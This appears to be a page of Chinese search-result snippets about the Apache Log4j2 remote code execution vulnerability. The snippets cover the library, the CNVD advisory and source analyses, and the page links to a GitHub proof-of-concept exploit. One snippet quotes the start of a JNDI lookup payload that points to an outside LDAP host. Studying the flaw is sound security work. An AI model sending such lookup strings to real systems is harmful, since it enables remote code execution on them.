Apache Log4j2 懂得自然懂 https://github.com/tangxiaofeng7/apache-log4j-poc.git ...

0x00 前言 作者：Moco 慢慢的距离上次写文章已过去了377天，这一年发生了好多好多的事，经历了好多好多的变故，或喜或悲、或分或合、起起落落，整整的一年了得，没怎么好好学习，没怎么认真的 ...

一、log4j2简介 log4j2是log4j 1.x和logback的改进版，据说采用了一些新技术（无锁异步、等等），使得日志的吞吐量、性能比log4j 1.x提高10倍，并解决了一些死锁的bug，而且配置更加简单灵活 maven配置 也可以配置starter ...

前言 本文建立在log4j-core 2.12.1版本为基础,在此基础上进行的源码剖析 Log4j2的配置可以通过以下四种方式之一完成 通过以XML、JSON、YAML或属性格式编写的配置文件。 通过创建ConfigurationFactory和Configuration以编程方式 ...

0X00-引言 过年了，放炮 这个漏洞真牛逼，日天，日地，日空气 2021年12月10日凌晨，我正坐在马桶上，突然看到厕纸上面出现一串神秘代码${jndi:ldap://kao5b1ig.n ...

Apache Log4j2 RCE远程代码执行漏洞 漏洞介绍 1、2021年12月10日，国家信息安全漏洞共享平台（CNVD）收录了Apache Log4j2 远程代码执行漏洞（CNVD-2021-95914）。攻击者利用该漏洞，可在未授权的情况下远程执行代码。目前，漏洞利用细节已公开 ...

前言 漏洞描述 Apache Log4j2是一款优秀的Java日志框架。2021年11月24日，阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞。由于Apache Log4j2某些功能存在递归解析功能，攻击者可直接构造恶意请求，触发远程代码执行 ...

利用： https://github.com/tangxiaofeng7/apache-log4j-poc 简单分析+审计： https://bbs.ichunqiu.com/thread-62322-1-1.html https://mp.weixin.qq.com/s ...